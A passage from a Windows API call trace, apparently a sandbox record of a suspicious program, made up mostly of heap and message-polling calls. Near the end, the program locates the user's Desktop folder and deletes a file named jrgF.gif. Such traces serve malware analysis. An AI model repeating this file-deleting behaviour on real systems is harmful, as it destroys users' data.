hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0166.124] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0166.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0166.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0166.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.125] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.125] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.125] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.126] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.126] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0166.126] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.126] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0166.126] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0166.126] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0166.126] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.127] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.127] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0166.127] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.127] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0166.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.127] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0166.127] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.127] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0166.128] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.128] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.128] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0166.128] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.128] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0166.128] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.128] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.128] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0166.128] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.128] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.128] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.128] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.128] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.128] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0166.128] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.128] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.128] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.129] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.129] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.129] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.129] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0166.129] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.129] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0166.129] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.129] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.129] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0166.129] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.129] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.129] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.129] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.129] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.130] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0166.130] FreeLibrary (hLibModule=0x74d40000) returned 1 [0166.130] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.130] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0166.130] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0166.132] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.132] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0166.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0166.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0166.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0166.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0166.132] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416f30 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5e) returned 0x240da88 [0166.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/jrgF.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jrgF.gif", lpFilePart=0x8bedfc*="jrgF.gif") returned 0x2e [0166.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0166.134] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jrgF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrgf.gif")) returned 0x20 [0166.134] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jrgF.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ad0880, ftCreationTime.dwHighDateTime=0x1d4ccc4, ftLastAccessTime.dwLowDateTime=0xf67e7bc0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0xf67e7bc0, ftLastWriteTime.dwHighDateTime=0x1d4d53e, nFileSizeHigh=0x0, nFileSizeLow=0x130fe, dwReserved0=0x55, dwReserved1=0x4, cFileName="jrgF.gif", cAlternateFileName="")) returned 0xaa55e0 [0166.134] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jrgF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jrgf.gif")) returned 1 [0166.139] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ad0880, ftCreationTime.dwHighDateTime=0x1d4ccc4, ftLastAccessTime.dwLowDateTime=0xf67e7bc0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0xf67e7bc0, ftLastWriteTime.dwHighDateTime=0x1d4d53e, nFileSizeHigh=0x0, nFileSizeLow=0x130fe, dwReserved0=0x55, dwReserved1=0x4, cFileName="jrgF.gif", cAlternateFileName="")) returned 0 [0166.139] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0166.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0166.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0166.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0166.140] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0166.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0166.140] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0166.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0166.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0166.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0166.141] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0166.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0166.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0166.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0166.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0166.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0166.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0166.141] RtlAllocateHeap 